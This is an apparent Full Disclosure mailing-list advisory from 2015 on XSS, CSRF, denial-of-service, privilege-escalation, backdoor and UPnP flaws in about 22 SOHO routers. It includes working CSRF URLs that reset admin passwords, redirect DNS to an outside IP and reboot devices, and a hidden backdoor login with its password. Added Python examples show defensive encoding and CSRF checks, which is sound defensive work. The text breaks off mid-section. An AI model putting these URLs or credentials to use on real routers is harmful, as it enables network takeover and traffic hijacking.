Message-ID: <CA+zb8-gqoq7O822yS3koXU_PNj-bq-MnzfMa7Ty=PcnDgO+xMA@mail.gmail.com>
Date: Thu, 28 May 2015 02:10:05 +0200
From: Jose Antonio Rodriguez Garcia <psycojugon@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] More than 60 undisclosed vulnerabilities affect 22 SOHO routers
Dear Full Disclosure community,
We are a group of security researchers doing our IT Security Master's Thesis at Universidad Europea de Madrid.
As part of the dissertation, we have discovered multiple vulnerabilities in the following SOHO routers:
1. Observa Telecom AW4062
2. Comtrend WAP-5813n
3. Comtrend CT-5365
4. D-Link DSL-2750B
5. Belkin F5D7632-4
6. Sagem LiveBox Pro 2 SP
7. Amper Xavi 7968 and 7968+
8. Sagem Fast 1201
9. Linksys WRT54GL
10. Observa Telecom RTA01N
11. Observa Telecom Home Station BHS-RTA
12. Observa Telecom VH4032N
13. Huawei HG553
14. Huawei HG556a
15. Astoria ARV7510
16. Amper ASL-26555
17. Comtrend AR-5387un
18. Netgear CG3100D
19. Comtrend VG-8050
20. Zyxel P 660HW-B1A
21. Comtrend 536+
22. D-Link DIR-600
The aforementioned vulnerabilities are:
- Persistent Cross Site Scripting (XSS) on #1, #2, #3, #6, #10, #12, #13, #14, #16, #17, #18, #19 and #20.
- Unauthenticated Cross Site Scripting on #3, #7, #8, #9, #10, #14, #16, #17 and #19.
- Cross Site Request Forgery (CSRF) on #1, #2, #3, #5, #10, #12, #13, #14, #15, #16, #18 and #20.
- Denial of Service (DoS) on #1, #5 and #10.
- Privilege Escalation on #1.
- Information Disclosure on #4 and #11.
- Backdoor on #10.
- Bypass Authentication using SMB Symlinks on #12.
- USB Device Bypass Authentication on #12, #13, #14 and #15.
- Bypass Authentication on #13 and #14.
- Universal Plug and Play related vulnerabilities on #2, #3, #4, #5, #6, #7, #10, #11, #12, #13, #14, #16, #21 and #22.
CVEs have already been requested from MITRE and other CNAs (since MITRE is taking forever to assign a CVE) and we are waiting for a response. OSVDB IDs have been assigned.
Vendors and manufacturers have already been notified.
All routers have been physically tested.
============================================================================================
Manufacturer: Observa Telecom
Model: AW4062
Tested firmwares: 1.3.5.18 and 1.4.2 (latest)
Comments: Common router that Spanish ISP Telefónica used to give away to their ADSL customers, especially during 2012.
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Multiple Cross-site Scripting (XSS) issues found in the configuration menu of the router web front-end. These XSS give an attacker the opportunity to execute malicious scripts.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
OSVDB-121211 (http://osvdb.org/show/osvdb/121211)
* PoC:
The threat is found in some input fields that allow special characters to be entered and then display the submitted information in the web interface itself.
For example, there is a vulnerable input field within the Domain Blocking subdirectory. When used legitimately, this input is used to block the traffic between the router and some particular domains.
The script remains stored (persistent XSS) in the Domain field of the Domain Block Table and is executed each time the victim accesses the Domain Blocking subdirectory.
This vulnerability can also be found within the input fields that belong to other subdirectories such as Firewall/URL Blocking, Firewall/Port Forwarding, Services/DNS/Dynamic DNS and Advance/SNMP, among others.
The most effective attack is found inside the Advance/SNMP subdirectory. By injecting the script into the System Name field, the malicious code is executed each time someone connects to the router, because the script is reflected into the home page.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Every input field is vulnerable to Cross Site Request Forgery (CSRF) attacks.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
OSVDB-121210 (http://osvdb.org/show/osvdb/121210),
OSVDB-121212 (http://osvdb.org/show/osvdb/121212) and
OSVDB-121214 (http://osvdb.org/show/osvdb/121214)
* PoC:
For example, if an attacker wants the victim to ping a certain IP address in order to check whether the victim is already logged into the router, he will send this URL to the victim:
http://192.168.1.1/goform/formPing?pingAddr=37.252.96.88
It is also possible for an attacker to change the default router password by sending the victim this URL:
http://192.168.1.1/goform/formPasswordSetup?userMode=0&oldpass=1234&newpass=12345&confpass=12345&save=%22Apply%20Changes%22
The URL above forces the user with index 0 (it is always going to be the user named 1234) to change his default password from 1234 to 12345.
The following URL forces the victim to change his DNS servers to those the attacker wants:
http://192.168.1.1/goform/formDNS?dnsMode=dnsManual&dns1=37.252.96.88&dns2=&dns3=
Any action which is available within the website can be attacked through CSRF. This includes opening ports, changing the DHCP and NTP servers, modifying the Wireless Access Point, enabling WPS, etc.
--------------------------------------------------------------------------------------------
---------------------------------- Privilege Escalation ----------------------------------
* Description: Any user without administrator rights is able to carry out a privilege escalation by reading the public router configuration file (config.xml). This file stores each of the router configuration parameters, including the credentials of all users in plain text.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
OSVDB-121213 (http://osvdb.org/show/osvdb/121213) and
OSVDB-121285 (http://osvdb.org/show/osvdb/121285)
* PoC:
A user without administrator rights (i.e., user) connects to the router through FTP. This user is able to get both the /etc/passwd and config.xml files.
The file config.xml stores each of the router configuration parameters in plain text, including the credentials of all users.
By doing so, any user is able to gain administrator privileges.
This is critical because not many people know there is another user apart from the administrator one. That means they only change the administrator password, leaving a default user with default credentials (user:user) that is able to escalate privileges.
--------------------------------------------------------------------------------------------
------------------------------------ Denial of Service -----------------------------------
* Description: An attacker is able to carry out an external Denial of Service attack.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
* PoC:
It is possible for an attacker to carry out a Denial of Service attack through CSRF:
http://192.168.1.1/goform/admin/formReboot
If a victim opens this URL, the router commits all the information and reboots, in a process that takes 60 seconds.
There are tons of ways for an attacker to carry out a Denial of Service attack by exploiting Cross Site Request Forgery vulnerabilities:
a) Establish new firewall rules in order to block certain URLs, IPs or MACs. Even setting up a global Deny rule is possible, allowing traffic only from/to certain IPs/MACs.
b) Delete the router configuration that allows it to connect to the Internet Service Provider.
c) Disable the Wireless Interface so no device can be connected through the 802.11 protocol.
d) Etc.
============================================================================================
============================================================================================
Manufacturer: Comtrend
Model: WAP-5813n (tested in Product Numbers 723306-104 and 723306-033)
Tested firmwares: P401-402TLF-C02_R35 and P401-402TLF-C04_R09 (latest one)
Comments: Common router that Spanish ISP Telefónica used to give away to their FTTH customers from 2011 to 2014.
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)
* PoC:
Despite the fact that most of the input fields do not allow special characters to be entered, there are still some of them in which an XSS can be performed.
For example, the SSID field within the Wireless>Basic subdirectory allows script code injection. The script execution can be clearly seen within the Wireless>Security and Wireless>MAC Filter subdirectories.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and
OSVDB-121217 (http://osvdb.org/show/osvdb/121217)
* PoC:
Every input field is vulnerable to CSRF.
Whenever the administrator user changes his password, he is actually opening the URL:
/password.cgi?adminPassword=newpassword
An attacker may send the following URL to the victim, so the administrator password will be changed to 1234567890:
http://192.168.1.1/password.cgi?adminPassword=1234567890
If an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link:
http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.252.96.88&dnsSecondary=37.252.96.89&dnsIfc=&dnsRefresh=1
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122383 (http://osvdb.org/show/osvdb/122383)
* PoC:
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers.
The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination).
These actions allow an attacker to carry out a persistent denial of service (the router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not in the LAN.
============================================================================================
============================================================================================
Manufacturer: Comtrend
Model: CT-5365
Tested firmwares: A111-306TKF-C02_R16
Comments: Common router that Spanish ISP Telefónica used to give away to their FTTH customers since 2012.
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)
* PoC:
Despite the fact that most of the input fields do not allow special characters to be entered, there are still some of them in which an XSS can be performed.
For example, the SSID field within the Wireless>Basic subdirectory allows script code injection. The script execution can be clearly seen within the Wireless>Security and Wireless>MAC Filter subdirectories.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and
OSVDB-121217 (http://osvdb.org/show/osvdb/121217)
* PoC:
Every input field is vulnerable to CSRF.
Whenever the administrator user changes his password, he is actually opening the URL:
/password.cgi?sysPassword=newpassword
An attacker may send the following URL to the victim, so the administrator password will be changed to 1234567890:
http://192.168.1.1/password.cgi?sysPassword=1234567890
If an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link:
http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.56.61.35.88&dnsSecondary=80.58.61.34&dnsDinamic=0&dnsRefresh=1
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignation.
OSVDB-121215 (http://osvdb.org/show/osvdb/121215)
* PoC:
An external attacker is able to inject malicious code within the router website without requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter.
The malicious code will be stored in the hostname field within the Connected Clients list (Device Info -> DHCP).
Once the victim views this list, the script is executed.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122383 (http://osvdb.org/show/osvdb/122383)
* PoC:
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers.
The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination).
These actions allow an attacker to carry out a persistent denial of service (the router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not in the LAN.
============================================================================================
============================================================================================
Manufacturer: D-Link
Model: DSL-2750B
Tested firmwares: EU_1.01
Comments:
--------------------------------------------------------------------------------------------
------------------ Information Disclosure (Insecure Object References) -------------------
* Description: An attacker is able to obtain critical information without being logged in.
* Report status: Reported to MITRE on 2015-03-25. Waiting for assignation.
OSVDB-121219 (http://osvdb.org/show/osvdb/121219)
* PoC:
By accessing the URL http://192.168.1.1/hidden_info.html, the browser shows a huge amount of parameters such as SSID, Wi-Fi password, PIN code, etc. without requiring any login process.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122384 (http://osvdb.org/show/osvdb/122384)
* PoC:
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers.
The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination).
These actions allow an attacker to carry out a persistent denial of service (the router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not in the LAN.
============================================================================================
============================================================================================
Manufacturer: Belkin
Model: F5D7632-4
Tested firmwares: 6.01.04
Comments:
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out malicious actions.
* Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15. Waiting for assignation.
OSVDB-121220 (http://osvdb.org/show/osvdb/121220)
* PoC:
Every input field is vulnerable to CSRF.
For example, if an attacker wants to change the DNS servers, he may use the following URL to do so:
http://192.168.2.1/cgi-bin/setup_dns.exe?page="setup_dns"&logout=""&dns1_1=37&dns1_2=252&dns1_3=96&dns1_4=88&dns2_1=37&dns2_2=252&dns2_3=96&dns2_4=89
--------------------------------------------------------------------------------------------
------------------------------------ Denial of Service -----------------------------------
* Description: An attacker is able to carry out an external Denial of Service attack.
* Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15. Waiting for assignation.
* PoC:
It is possible for an attacker to carry out a Denial of Service attack through CSRF:
http://192.168.2.1/cgi-bin/restart.exe?page="tools_gateway"&logout=""
This URL causes the router to reboot, interrupting any active connection and denying the service for about 20 seconds.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122389 (http://osvdb.org/show/osvdb/122389)
* PoC:
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers.
The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination).
These actions allow an attacker to carry out a persistent denial of service (the router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not in the LAN.
============================================================================================
============================================================================================
Manufacturer: Sagem
Model: LiveBox 2 Pro
Tested firmwares: FAST3yyy_671288
Comments: Common router that ISP Orange used to give away to their ADSL customers.
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code, even if the victim is not logged into the router web-config page.
* Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15. Waiting for assignation.
OSVDB-121223 (http://osvdb.org/show/osvdb/121223)
* PoC:
Despite the fact that most of the input fields do not allow special characters to be entered, there are still some of them in which an XSS can be performed.
1. The SSID field within the “Configuración-> Equipos -> Personalizar” (Configuration->Devices->Personalize) subdirectory allows script code injection. The script execution can be clearly seen within the “Configuración-> Equipos -> Mostrar” (Configuration->Devices->Show) subdirectory.
2. The SSID field within the “Configuración-> LiveBox-> Configuracion Wifi -> SSID-name” (Configuration->LiveBox->Wi-Fi Configuration->SSID-Name) subdirectory allows script code injection. The script execution can be clearly seen within the main log-in webpage, even if the user is not logged in.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122387 (http://osvdb.org/show/osvdb/122387)
* PoC:
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers.
The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination).
These actions allow an attacker to carry out a persistent denial of service (the router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not in the LAN.
============================================================================================
============================================================================================
Manufacturer: Amper
Model: Xavi 7968 and Xavi 7968+
Tested firmwares: 3.01APT94 (latest one)
Comments: Common router that ISP Telefónica used to give away to their ADSL customers from 2010 to 2013.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignation.
OSVDB-121224 (http://osvdb.org/show/osvdb/121224)
* PoC:
An external attacker is able to inject malicious code within the router website without requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter.
The malicious code will be stored in the hostname field within the Connected Clients list (/webconfig/status/dhcp_table.html).
Once the victim views this list, the script is executed.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify the WPS configuration by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122388 (http://osvdb.org/show/osvdb/122388)
* PoC:
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers.
The device supports multiple UPnP actions, such as changing the WPS configuration or resetting the AP to default settings.
============================================================================================
============================================================================================
Manufacturer: Sagem
Model: Fast 1201
Tested firmwares: 3.01APT94 (latest one)
Comments: -
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignation.
OSVDB-121222 (http://osvdb.org/show/osvdb/121222)
* PoC:
An external attacker is able to inject malicious code within the router website without requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter.
The malicious code will be stored in the hostname field within the DHCP Leases list (dhcpinfo.html).
Once the victim views this list, the script is executed.
============================================================================================
============================================================================================
Manufacturer: Linksys
Model: WRT54GL
Tested firmwares: 4.30.16 build 6
Comments: -
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignation.
OSVDB-121221 (http://osvdb.org/show/osvdb/121221)
* PoC:
An external attacker is able to inject malicious code within the router website without requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter.
The malicious code will be stored in the hostname field within the Connected Clients list (DHCPTable.asp). It can be accessed either directly through the URL or through the Status-> Local Network -> DHCP Clients Table subdirectories.
Once the victim views this list, the script is executed.
============================================================================================
============================================================================================
Manufacturer: Observa Telecom
Model: RTA01N
Tested firmwares: RTK_V2.2.13
Comments: Common router that Spanish ISP Telefónica used to give away to their ADSL/VDSL customers.
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Multiple Cross-site Scripting (XSS) issues found in the configuration menu of the router web front-end. These XSS give an attacker the opportunity to execute malicious scripts.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121787 (http://osvdb.org/show/osvdb/121787) and
OSVDB-121788 (http://osvdb.org/show/osvdb/121788)
* PoC:
The threat is found in some input fields that allow special characters to be entered and then display the submitted information in the web interface itself.
For example, the Nombre del host (Hostname) input field within the Servicio -> DDNS (Service -> DDNS or /ddns.htm) subdirectory is vulnerable.
There is another vulnerable input field within the Mantenimiento -> Contraseña (Maintenance -> Password or /userconfig.htm) subdirectory. After creating a user whose username contains the malicious script, it is stored in the User Accounts table and executes once the victim accesses this subdirectory.
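The persistent XSS findings in this advisory (AW4062, WAP-5813n, CT-5365, LiveBox 2 Pro and the RTA01N above) share one root cause: a stored configuration value (blocked domain, SSID, SNMP System Name, DDNS hostname, username) is pasted into the admin page without output encoding. The Python below is an added example written for this page, not code from the advisory or from any of the routers' firmware. It contrasts the vulnerable rendering pattern with context-aware encoding for the three places such a value ends up: table text, an edit form attribute, and a link's query string. The sample entries, the /goform/formDomainBlock endpoint and the field names are constructed for illustration.

```python
import html
from urllib.parse import quote

# Constructed sample values of the kind an attacker can store in a Domain
# Block Table, SSID, SNMP System Name or DDNS hostname field.
SAMPLE_ENTRIES = [
    "example.com",
    "<script>alert(1)</script>",
    'x" onmouseover="alert(1)',
]


def render_table_unsafe(entries):
    """The pattern the advisory describes: stored values concatenated into
    HTML as-is, so any markup they contain runs in the admin's browser."""
    rows = "".join(f"<tr><td>{e}</td></tr>" for e in entries)
    return "<table>" + rows + "</table>"


def render_table_safe(entries):
    """HTML text context: html.escape turns & < > " ' into entities, so the
    value is displayed literally instead of being parsed as markup."""
    rows = "".join(f"<tr><td>{html.escape(e, quote=True)}</td></tr>" for e in entries)
    return "<table>" + rows + "</table>"


def render_edit_field_safe(field_name, value):
    """Attribute context: the stored value is echoed back into the edit
    form. quote=True is essential here; a bare '"' would end the attribute."""
    return (f'<input name="{html.escape(field_name, quote=True)}" '
            f'value="{html.escape(value, quote=True)}">')


def render_delete_link_safe(entry):
    """URL context: percent-encode the value for the query string first
    (hypothetical /goform/formDomainBlock?del= endpoint), then HTML-encode
    the finished attribute value."""
    href = "/goform/formDomainBlock?del=" + quote(entry, safe="")
    return f'<a href="{html.escape(href, quote=True)}">delete</a>'


def survives_as_markup(rendered, value):
    """True when a value containing markup characters appears verbatim in
    the rendered page, i.e. the encoding step was skipped."""
    return any(c in value for c in '<>"\'') and value in rendered


if __name__ == "__main__":
    print("unsafe:", render_table_unsafe(SAMPLE_ENTRIES))
    print("safe:  ", render_table_safe(SAMPLE_ENTRIES))
    print(render_edit_field_safe("domain", SAMPLE_ENTRIES[2]))
    print(render_delete_link_safe(SAMPLE_ENTRIES[1]))
```

Encoding is chosen per output context rather than by stripping characters on input: the SNMP System Name field the advisory singles out legitimately needs characters such as `&` and `'`, and the same stored value is rendered in all three contexts, so the encoding belongs at the point where the value meets the page.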
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Every input field is vulnerable to Cross Site Request Forgery (CSRF) attacks.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121786 (http://osvdb.org/show/osvdb/121786)
* PoC:
For example, if an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link:
http://192.168.1.1/form2Dns.cgi?dnsMode="1"&dns1="37.252.96.88"&dns2="37.252.96.89"&dns3=""&submit.htm?dns.htm="Send"&save="Aplicar cambios"
It is also possible for an attacker to change the default router administrator password by sending the victim this URL:
http://192.168.1.1/form2userconfig.cgi?username="1234"&privilege=2&oldpass="1234"&newpass="newpass"&confpass="newpass"&modify="Modificar"&select="s0"&hiddenpass="1234"&submit.htm?userconfig.htm="Send"
The URL above forces the administrator user (it is always going to be the user named 1234) to change his default password from 1234 to newpass.
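Every CSRF PoC in this advisory (AW4062, WAP-5813n, CT-5365, F5D7632-4 and the RTA01N URLs above) works for the same reason: a configuration change is a GET whose parameters sit in the query string, and its only precondition is a browser that is logged in. The Python below is an added example, not code from the advisory or from any vendor's firmware. It shows the policy a router's configuration handlers should run before acting: POST only, an Origin or Referer that matches the admin UI, and a per-session synchronizer token compared in constant time. The session store, the admin origins and the request shapes are constructed for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed session store: session id -> per-session secret used to derive
# the CSRF token. In a real device this lives alongside the login session.
SESSIONS = {"sess-a1": secrets.token_hex(16)}
# Assumed origins of the admin UI; a request from anywhere else is cross-site.
ROUTER_ORIGINS = {"http://192.168.1.1", "https://192.168.1.1"}


def issue_token(session_id):
    """Synchronizer token: HMAC of a fixed label under the session secret,
    embedded in every configuration form as a hidden field. The secret
    itself never leaves the device."""
    return hmac.new(SESSIONS[session_id].encode(), b"csrf", hashlib.sha256).hexdigest()


def origin_of(headers):
    """Origin header if present, otherwise the Referer reduced to scheme://host."""
    value = headers.get("Origin") or headers.get("Referer")
    if not value:
        return None
    parts = urlsplit(value)
    return f"{parts.scheme}://{parts.netloc}"


def check_state_change(method, headers, session_id, form):
    """Policy every configuration-changing handler (DNS, password, reboot...)
    applies before touching the configuration. Returns (allowed, reason)."""
    if method != "POST":
        return False, "state changes must be POST; a GET link is the CSRF vector"
    if session_id not in SESSIONS:
        return False, "no authenticated session"
    origin = origin_of(headers)
    if origin is None:
        return False, "missing Origin and Referer"
    if origin not in ROUTER_ORIGINS:
        return False, "cross-origin request from " + origin
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, issue_token(session_id)):
        return False, "bad or missing CSRF token"
    return True, "ok"


def check_poc_url(url, session_id="sess-a1"):
    """Run a GET-style configuration URL through the policy: the query is
    parsed as the form would be, but the request is refused on method alone."""
    query = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    return check_state_change("GET", {"Referer": "http://attacker.invalid/"}, session_id, query)


if __name__ == "__main__":
    print(check_poc_url("http://192.168.1.1/form2Dns.cgi?dnsMode=1&dns1=192.0.2.1"))
    tok = issue_token("sess-a1")
    print(check_state_change("POST", {"Origin": "http://192.168.1.1"}, "sess-a1", {"csrf_token": tok}))
```

The three checks are layered deliberately: the method check alone defeats every URL in this advisory, the Origin/Referer check stops a cross-site auto-submitting form, and the token check covers the case where neither header is available to the device.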
--------------------------------------------------------------------------------------------
------------------------------------ Denial of Service -----------------------------------
* Description: An attacker is able to carry out an external Denial of Service attack.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
* PoC:
It is possible for an attacker to carry out a Denial of Service attack through CSRF:
http://192.168.1.1/form2Reboot.cgi?rebootMode=0&reboot="Reiniciar"&submit.htm?reboot.htm="Send"
If a victim opens this URL, the router replies with an HTTP 200 OK status code and reboots.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121789 (http://osvdb.org/show/osvdb/121789)
* PoC:
An external attacker is able to inject malicious code within the router website without requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter.
The malicious code will be stored within the DHCP Active Clients table (/dhcptbl.html).
Once the victim views this list, the script is executed.
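The unauthenticated XSS reported for the CT-5365, Xavi 7968, Fast 1201, WRT54GL and the RTA01N above comes from one input: the DHCP Host Name option (option 12, RFC 2132) copied verbatim into the DHCP client table. The Python below is an added example, not code from the advisory or any firmware. It parses the option area of a constructed DHCPREQUEST, validates the host name against the RFC 1123 character rules before it is stored, and otherwise stores an HTML-encoded placeholder so a non-conforming name can still be inspected safely. The option bytes and host names are constructed samples.

```python
import html
import re

# DHCP option codes used here (RFC 2132)
OPT_PAD, OPT_HOST_NAME, OPT_MSG_TYPE, OPT_END = 0, 12, 53, 255
DHCPREQUEST = 3


def parse_dhcp_options(raw):
    """Parse the TLV option area of a DHCP message into {code: bytes}.
    PAD has no length byte, END terminates the list, and a length that runs
    past the buffer is rejected instead of being read out of bounds."""
    opts, i = {}, 0
    while i < len(raw):
        code = raw[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        if i + 1 >= len(raw):
            raise ValueError("truncated option header")
        length = raw[i + 1]
        value = raw[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        opts[code] = value
        i += 2 + length
    return opts


# One RFC 1123 label: letters, digits and hyphens, no leading/trailing hyphen.
_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def valid_hostname(name):
    """Dot-separated RFC 1123 labels, <= 63 characters each, <= 253 in total."""
    if not name or len(name) > 253:
        return False
    return all(_LABEL.match(label) for label in name.split("."))


def client_display_name(options):
    """The value the DHCP client table should store for this client: the
    validated host name, or a neutral placeholder with the raw bytes
    HTML-encoded so the administrator can still see what was sent."""
    opts = parse_dhcp_options(options)
    raw = opts.get(OPT_HOST_NAME, b"")
    try:
        name = raw.decode("ascii")
    except UnicodeDecodeError:
        name = ""
    if valid_hostname(name):
        return name
    return "(invalid host name: " + html.escape(raw.decode("latin-1"), quote=True) + ")"


def build_request_options(hostname):
    """Constructed sample option area: message type DHCPREQUEST, host name, END."""
    return bytes([OPT_MSG_TYPE, 1, DHCPREQUEST, OPT_HOST_NAME, len(hostname)]) + hostname + bytes([OPT_END])


if __name__ == "__main__":
    for sample in (b"laptop-01", b"<script>alert(1)</script>", b"-bad"):
        print(repr(sample), "->", client_display_name(build_request_options(sample)))
```

Validation on input and encoding on output are both applied here on purpose: the host-name grammar rejects the injected script outright, and the fallback still encodes, so a later change to the grammar cannot reopen the table to markup.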
--------------------------------------------------------------------------------------------
----------------------------------------- Backdoor ---------------------------------------
* Description: There is a second default administrator user who is hidden from the legitimate router owner.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121785 (http://osvdb.org/show/osvdb/121785)
* PoC:
In addition to the well-known 1234 administrator user, there is another one named admin, whose password is 7449airocon.
This superuser remains hidden (it only appears in the backup configuration XML file) and is able to modify any configuration settings either through the web interface or through telnet.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules, carry out a
persistent denial of service and obtain the WLAN passwords, among other things, by using
the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.
OSVDB-122386 (http://osvdb.org/show/osvdb/122386)
* PoC:
The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has
many weaknesses, such as the lack of an authentication process, which can be exploited by
attackers.
The device supports multiple UPnP actions, such as changing the firewall rules
